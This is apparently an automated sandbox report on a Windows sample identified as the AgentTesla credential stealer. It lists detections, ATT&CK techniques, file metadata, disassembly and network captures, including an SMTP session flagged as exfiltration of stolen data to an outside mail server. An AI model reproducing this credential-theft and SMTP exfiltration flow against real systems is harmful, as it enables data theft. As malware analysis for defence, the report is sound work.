                      Source: Yara matchFile source: 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: D6yz87XjgM.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7908, type: MEMORYSTR
                      | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                      | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                      | Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 311 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                      | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | 1 Credentials in Registry | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
                      | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                      | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                      | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 141 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                      | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                      | Source | Detection | Scanner | Label |
                      | D6yz87XjgM.exe | 37% | ReversingLabs | Win32.Trojan.Midie |
                      | D6yz87XjgM.exe | 100% | Avira | TR/AD.GenSteal.zobjr |
                      No Antivirus matches
                      | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                      | api.ipify.org | 172.67.74.152 | true | false | | high |

                      | Name | Malicious | Antivirus Detection | Reputation |
                      | https://api.ipify.org/ | false | | high |

                      | Name | Source | Malicious | Antivirus Detection | Reputation |
                      | http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 | D6yz87XjgM.exe | false | | high |
                      | https://api.ipify.org | D6yz87XjgM.exe, 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                      | https://sectigo.com/CPS0 | D6yz87XjgM.exe | false | | high |
                      | http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | D6yz87XjgM.exe | false | | high |
                      | https://account.dyn.com/ | D6yz87XjgM.exe, 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high |
                      | http://ocsp.sectigo.com0 | D6yz87XjgM.exe | false | | high |
                      | https://api.ipify.org/t | RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                      | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                      | http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z | D6yz87XjgM.exe | false | | high |
                      | http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# | D6yz87XjgM.exe | false | | high |
                                              | IP | Domain | Country | ASN | ASN Name | Malicious |
                                              | 162.254.34.31 | unknown | United States | 64200 | VIVIDHOSTINGUS | true |
                                              | 172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1549405
                                              Start date and time:2024-11-05 16:03:59 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 49s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:D6yz87XjgM.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be.exe
                                              Detection:MAL
                                              Classification:mal100.spre.troj.spyw.evad.winEXE@5/1@1/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 83
                                              • Number of non-executed functions: 52
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: D6yz87XjgM.exe
                                              | Time | Type | Description |
                                              | 10:05:05 | API Interceptor | 117x Sleep call for process: RegAsm.exe modified |
                                                                  Process:C:\Users\user\Desktop\D6yz87XjgM.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):50
                                                                  Entropy (8bit):1.5212424590621707
                                                                  Encrypted:false
                                                                  SSDEEP:3:/lvlp:p
                                                                  MD5:C851BF93667BDD6310D56581D955C2AE
                                                                  SHA1:8FC5AEC1542BD7471BF815632863622EFE23A834
                                                                  SHA-256:3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D
                                                                  SHA-512:D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:........................................user.
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):6.4541856796164225
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • VXD Driver (31/22) 0.00%
                                                                  File name:D6yz87XjgM.exe
                                                                  File size:1'653'512 bytes
                                                                  MD5:eb180d9ac3c0ee0feb1b997ef3908f36
                                                                  SHA1:17dcf2886e1dce74561ac12b4374b7d441f399b8
                                                                  SHA256:6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be
                                                                  SHA512:7afb7b99b23754e8edbee1d1ef2fad3191aac17e49eded473c3fe1a806607721717549bb7ffc131c6ab670c83bc8149a76de392b94d8d55cccb6c9296ab19f8c
                                                                  SSDEEP:49152:LbdYAm4zrbdYAm4zobdYAm4zvbdYAm4zdbdYAm4zZbdYAm4zgjT:Xdr3drCdrzdrddrRdrgX
                                                                  TLSH:F1759D43724C57ADDAA30B31F63FC0A413259EBF56144B1B32CBFB2D19BA15B492A2C5
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...eg.g..........................................@..........................@......h......................................
                                                                  Icon Hash:6ced8d96b2ace4b2
                                                                  Entrypoint:0x57c3ae
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x67076765 [Thu Oct 10 05:34:29 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:e0e5cba487d80ef75c8cfd3e40cc6131
                                                                  Signature Valid:false
                                                                  Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                  Error Number:-2146869232
                                                                  Not Before, Not After
                                                                  • 29/07/2022 03:15:36 29/07/2025 03:15:36
                                                                  Subject Chain
                                                                  • E=info@telegram.org, CN=Telegram FZ-LLC, O=Telegram FZ-LLC, L=Dubai, S=Dubai, C=AE, OID.1.3.6.1.4.1.311.60.2.1.2=Dubai, OID.1.3.6.1.4.1.311.60.2.1.3=AE, SERIALNUMBER=94349, OID.2.5.4.15=Private Organization
                                                                  Version:3
                                                                  Thumbprint MD5:D26432F60E2A3BBEB3537B78CB826828
                                                                  Thumbprint SHA-1:71AB79E1C8FF155838C37A5299AE215C52BF6D1D
                                                                  Thumbprint SHA-256:BCB22974DD56BFE9A9197D05C2D4B646F5BDF23B8BA2ACB8FD9DB1557245A407
                                                                  Serial:7AE2B5021371F092A904B6FA
                                                                  Instruction
                                                                  jmp 00007FCDA4BD6A6Eh
                                                                  add byte ptr [ebp-75h], dl
                                                                  in al, dx
                                                                  push ecx
                                                                  push ecx
                                                                  push 00401006h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  push 00000014h
                                                                  pop eax
                                                                  call 00007FCDA4BD6781h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-08h], esp
                                                                  mov dword ptr [ebp-04h], 0057E490h
                                                                  call 00007FCDA4D1FCEEh
                                                                  push 0057C3F7h
                                                                  jmp 00007FCDA4D51B5Bh
                                                                  lea ecx, dword ptr [ebp-20h]
                                                                  call 00007FCDA4BD696Ah
                                                                  ret
                                                                  ret
                                                                  lea esi, dword ptr [ebp-20h]
                                                                  mov edi, dword ptr [ebp+08h]
                                                                  movsd
                                                                  movsd
                                                                  movsd
                                                                  movsd
                                                                  mov eax, dword ptr [ebp+08h]
                                                                  mov ecx, dword ptr [ebp-10h]
                                                                  mov dword ptr fs:[00000000h], ecx
                                                                  pop edi
                                                                  pop esi
                                                                  pop ebx
                                                                  leave
                                                                  retn 0004h
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push ecx
                                                                  push ecx
                                                                  push 00401006h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  push 00000018h
                                                                  pop eax
                                                                  call 00007FCDA4BD6720h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-08h], esp
                                                                  mov dword ptr [ebp-04h], 0057E4A0h
                                                                  mov dword ptr [ebp-24h], 00000030h
                                                                  push 00000004h
                                                                  lea eax, dword ptr [ebp-24h]
                                                                  push eax
                                                                  push 00000022h
                                                                  push FFFFFFFFh
                                                                  call 00007FCDA4BE001Dh
                                                                  call 00007FCDA4BD685Ah
                                                                  push 0057C46Eh
                                                                  jmp 00007FCDA4D51B5Bh
                                                                  lea ecx, dword ptr [ebp-20h]
                                                                  call 00007FCDA4BD68F3h
                                                                  ret
                                                                  ret
                                                                  lea esi, dword ptr [ebp-20h]
                                                                  mov edi, dword ptr [ebp+08h]
                                                                  movsd
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17e51c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x183000 | 0x10b18 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x191000 | 0x2b08 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x17e000 | 0x1e4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x17c714 | 0x17d000 | 8255470300e1a49d0f64e4d18447a703 | False | 0.6001585312089895 | data | 6.503870538873717 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x17e000 | 0xd04 | 0x1000 | 8b49f51d5aecf86a97629e56d1bce9ae | False | 0.324462890625 | data | 4.396409590241252 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x17f000 | 0x3d24 | 0x1000 | 620f0b67a91f7f74151bc5be745b7110 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x183000 | 0x10b18 | 0x11000 | b438a85e6b16962e124be0333a78acd7 | False | 0.08263442095588236 | data | 3.7430046353398554 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1830e8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 34556 x 34556 px/m | | | 0.07952797823258015
RT_GROUP_ICON | 0x193910 | 0x14 | data | | | 1.15
RT_VERSION | 0x193924 | 0x1f4 | data | German | Germany | 0.5
DLL | Import
KERNEL32.DLL | GetProcAddress, VirtualAlloc, GetModuleHandleW
MSVBVM60.DLL | __vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaLineInputStr, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaRefVarAry, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVargVarMove, __vbaVarZero, __vbaVarCmpGt, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, DllFunctionCall, __vbaVarOr, __vbaRedimPreserve, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaNew, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaVarLateMemCallLd, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, __vbaStrVarCopy, __vbaForEachVar, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr
Language of compilation system | Country where language is spoken | Map
German | Germany |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-05T16:05:16.773977+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.7 | 49741 | TCP
2024-11-05T16:06:01.795556+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.7 | 55627 | TCP
2024-11-05T16:06:46.896832+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.7 | 49706 | 162.254.34.31 | 587 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Nov 5, 2024 16:05:07.779706955 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:07.942066908 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:07.942506075 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:07.947351933 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:08.103552103 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:08.103756905 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:08.109263897 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.244976044 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.245137930 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.245445967 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.245486021 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.245628119 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.245657921 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.246100903 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.246134043 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.250422955 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.409636974 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.410505056 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.410572052 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.410609961 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.410625935 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:05:09.415962934 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.415972948 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.416086912 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.416096926 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.606158018 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:05:09.661096096 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:06:46.732836008 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:06:46.737782955 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:06:46.896697998 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:06:46.896831989 CET49706587192.168.2.7162.254.34.31
                                                                  Nov 5, 2024 16:06:46.902301073 CET58749706162.254.34.31192.168.2.7
                                                                  Nov 5, 2024 16:06:46.902365923 CET49706587192.168.2.7162.254.34.31
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 16:05:04.509944916 CET | 63854 | 53 | 192.168.2.7 | 1.1.1.1
Nov 5, 2024 16:05:04.709742069 CET | 53 | 63854 | 1.1.1.1 | 192.168.2.7
Nov 5, 2024 16:05:22.278187037 CET | 53 | 57486 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 5, 2024 16:05:04.509944916 CET | 192.168.2.7 | 1.1.1.1 | 0x677d | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 5, 2024 16:05:04.709742069 CET | 1.1.1.1 | 192.168.2.7 | 0x677d | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 16:05:04.709742069 CET | 1.1.1.1 | 192.168.2.7 | 0x677d | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 16:05:04.709742069 CET | 1.1.1.1 | 192.168.2.7 | 0x677d | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                                                  • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49704 | 172.67.74.152 | 443 | 7908 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-05 15:05:05 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-05 15:05:05 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Tue, 05 Nov 2024 15:05:05 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8dddbd71a8d56b30-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1100&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=2520452&cwnd=230&unsent_bytes=0&cid=9b77fc2287e7f7dc&ts=317&x=0"
2024-11-05 15:05:05 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
Data Ascii: 173.254.250.76


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 5, 2024 16:05:07.448519945 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 220 server1.educt.shop127.0.0.1 ESMTP Postfix
Nov 5, 2024 16:05:07.449330091 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | EHLO 830021
Nov 5, 2024 16:05:07.610507965 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250-server1.educt.shop127.0.0.1
250-PIPELINING
250-SIZE 204800000
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING
Nov 5, 2024 16:05:07.611438990 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A=
Nov 5, 2024 16:05:07.773389101 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 334 UGFzc3dvcmQ6
Nov 5, 2024 16:05:07.942066908 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 235 2.7.0 Authentication successful
Nov 5, 2024 16:05:07.942506075 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | MAIL FROM:<sendxsenses@vetrys.shop>
Nov 5, 2024 16:05:08.103552103 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.0 Ok
Nov 5, 2024 16:05:08.103756905 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | RCPT TO:<senses@vetrys.shop>
Nov 5, 2024 16:05:09.244976044 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok
Nov 5, 2024 16:05:09.245137930 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | DATA
Nov 5, 2024 16:05:09.245445967 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok
Nov 5, 2024 16:05:09.245628119 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok
Nov 5, 2024 16:05:09.246100903 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok
Nov 5, 2024 16:05:09.409636974 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 354 End data with <CR><LF>.<CR><LF>
Nov 5, 2024 16:05:09.410625935 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | .
Nov 5, 2024 16:05:09.606158018 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.0.0 Ok: queued as 313B76F1DE
Nov 5, 2024 16:06:46.732836008 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | QUIT
Nov 5, 2024 16:06:46.896697998 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 221 2.0.0 Bye

Target ID: 4
Start time: 10:04:57
Start date: 05/11/2024
Path: C:\Users\user\Desktop\D6yz87XjgM.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\D6yz87XjgM.exe"
Imagebase: 0x400000
File size: 1'653'512 bytes
MD5 hash: EB180D9AC3C0EE0FEB1B997EF3908F36
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
